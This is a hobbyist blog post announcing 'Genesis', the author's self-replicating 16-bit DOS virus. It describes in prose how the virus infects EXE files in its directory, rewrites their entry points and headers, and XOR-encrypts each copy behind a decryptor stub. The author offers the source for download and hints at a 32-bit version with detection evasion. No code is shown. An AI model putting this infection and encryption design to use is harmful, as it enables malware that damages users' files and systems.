After two weeks of exhausting yet “exciting” hard work it’s finally here! Ladies and gentlemen am glad to introduce to you “Genesis”; my first malicious self-replicating metamorphic piece of code, or in simpler terms … my first computer virus! :D

The story began on a cold Friday evening a couple of weeks ago. By then the semester was already over and I was about to start studying for my upcoming final exams. My friend Jareer had an assembly exam and asked for my help trying out few assembly programs days before his exam.

We gathered at Basel’s house, set up a laptop and an assembler and immediately began writing and assembling short snippets of code. One of the things that I always like to do when I help a friend with a computer-related course is to make and show him, at the spot, a practical and interesting application of the thing he’s studying as a mere attempt to raise his spirit before getting into boring technicalities.

The curriculum of the assembly course he has taken did cover File Access interrupts; how low level assembly code deals with files and the file system in general. It was an interesting subject for me to read about, especially that I had no knowledge about this specific topic and I wondered about it a couple of times before!

Anyway, the notes he had were straight forward and provided enough information for me to make a short program that dumps itself from memory into an executable COM file. That is; it creates a simple executable containing its own code.

I showed the program to Zaid, who was there that time, and he laughed a bit. “Not like it can dump itself into an EXE!” he said, which was a good point on why this was a lame attempt. For those of you who don’t know; COM Files are the simplest kind of executables there is; they contain pure machine code right from the first byte all over till the last one. EXE executable files, on contrary, support multi-segment code and contain a variety of tables and values instructing the OS how to load and execute their code. Their structure is so complicated that you certainly need to research a little bit before deciding the mess with an EXE file using a hex editor!

Zaid’s comment on copying into EXE files made me think … “why not? :P” …

The following day was the start of two weeks of hard work. I was a bit uncomfortable during this period because the exams were going and I couldn’t resist working on this thing. I worked whole nights before exams and managed to study a little bit although I wasn’t into it, not at all.

Anyway, here’s a glance of what I got! Some basic information that you need to know before you continue reading on …

Shown above is the structure of simple DOS executable that has no Windows header (left), and next to it (right) is a diagram of the same executable once loaded in memory. The executable file contains what is called a “DOS Header”, which is a bunch of information that the operating system needs to know in order to handle the executable. The header includes such information as: the size of the file in blocks (chunks of 512 bytes), the number of bytes in the last block, the size of the header itself, a pointer to a Windows header (if any exist), the file checksum word, the offset where code starts, and the initial value of the IP register (called the program’s Entry Point).

So what I was trying to make was a piece of code that appends itself to an executable file and modifies the executable’s entry point so that execution starts with the appended code. Later, this code will perform a jump to pass execution to the host program. The “injection” must be accompanied with the appropriate modifications to the file header to ensure that the file remains a valid DOS executable and behaves as expected.

After some reading, I was able to manually inject an executable into another using a hex editor. Soon after I formulated a code snippet to do that and with a bit of more work I came out with Genesis. Here’s how it works …

Genesis will check all files with an EXE extension in its current directory. It will analyze matching files to find suitable victims. Target executables must be valid 16-bit DOS executables that are smaller than 64 KBs. Once a victim is located, it is infected with the virus. The infection process involves creating an encrypted copy of the virus code with a decryption module on top of it. Genesis will encrypt itself by performing a series of XOR operations on its own machine code with a series of incrementing bytes starting with a random value, a key. This key will be saved in the decryption module for the generated virus copy to decrypt itself and run later. The encrypted copy of the virus code will be generated on top of the host program’s stack segment, which is used as the working area for the virus. The following diagram illustrates the structure of an infected executable, and the corresponding process once loaded in memory …

The victim’s entry point will be changed to point to the offset of the decryption module. The amount of memory demanded by the victim application as a stack segment will be increased to allow the virus to use the stack segment to copy itself later.

Although Genesis is a 16-bit virus and is emulated rather than actually ran by Windows on 32-bit Pentium machines, it is definitely considered a computer virus! Both McAfee Enterprise and Symantec Antivirus recognize the viral activity of Genesis, although their responses were a bit different. McAfee blocks Genesis whenever it tries to infect other programs and identifies it as Univ/r. Symantec, on the other hand, recognizes the virus code before execution and identifies it as Bloodhound.DirActEXE. The viral activity is pretty obvious because this virus modifies the entry points of other executables which is suspicious enough I guess :P

You can download Genesis Assembly Source Code (2 KBs) here. You may need a bunch of some handy 16-bit applications (1 KB) for your infection purposes, plus Microsoft Macro Assembler 5.13 & CodeView 3.14 (388 KB) to compile and observe the activity of the virus.

The virus source code linked above is safe to download. Compiling this code will generate a special infected program, it will NOT compile into Genesis. This is simply because Genesis is not a standalone program; it is a piece of code. The differences between this program and other infected ones are that this program passes execution to the virus code by itself; it’s not hijacked. Also, this program contains bare unencrypted virus code.

This virus does not do anything except for replication. It also displays a notification whenever it is executed and shows a brief of its file-scan status.

Genesis is just the start; I’ve already started researching the possibility of developing a 32-bit version of the virus targeting Windows executables. The good thing is; the virus code is less than 2 KBs in size which leaves plenty of room for further tricks and functionality. I also became acquainted with some means of evading detection but I’ll save them for my future plans. Putting any more work on an open-source virus will be a waste of my time.

Please note that this virus was made for educational and entertainment purposes only, and as a proof-of-concept that viruses can be engineered on 16-bit platforms and ran on 32-bit ones. Whether or not you decide to screw yourself and your 16-bit applications by running this virus is totally up to you. Genesis should NOT be used for destructive purposes (yeah right :P). No seriously, this is dangerous and should not be run without taking the necessary precautions. Have fun ;)